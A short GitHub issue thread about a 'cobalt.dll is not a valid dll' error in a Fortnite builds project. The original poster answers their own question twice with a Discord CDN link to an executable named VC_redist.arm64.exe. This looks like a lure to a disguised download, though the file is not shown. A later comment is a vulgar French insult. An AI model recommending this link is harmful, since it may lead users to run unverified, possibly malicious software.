### ISSUE TITLE
“cobalt.dll dll is not a valid dll, fix it in the settings tab”

### ISSUE THREAD

**Issue by YTEric10** [simplyblk/Fortnitebuilds#36]
“cobalt.dll dll is not a valid dll, fix it in the settings tab” pls help me

**Comment by YTEric10** [comment]
I've find out how to solve this issue. You need to Download something.

**Comment by YTEric10** [comment]
Download this [(https://cdn.discordapp.com/attachments/1195281298084859964/1195281343437881344/VC_redist.arm64.exe?ex=65b36b7f&is=65a0f67f&hm=af5b09911f09e3a10370cb565873140bf301c4e82be6744a50efc745232c42fd&)]

**Comment by YTEric10** [comment]
Download this [](https://cdn.discordapp.com/attachments/1195281298084859964/1195281343437881344/VC_redist.arm64.exe?ex=65b36b7f&is=65a0f67f&hm=af5b09911f09e3a10370cb565873140bf301c4e82be6744a50efc745232c42fd&)

**Comment by meaziou** [comment]
bouffe mes couilles salope
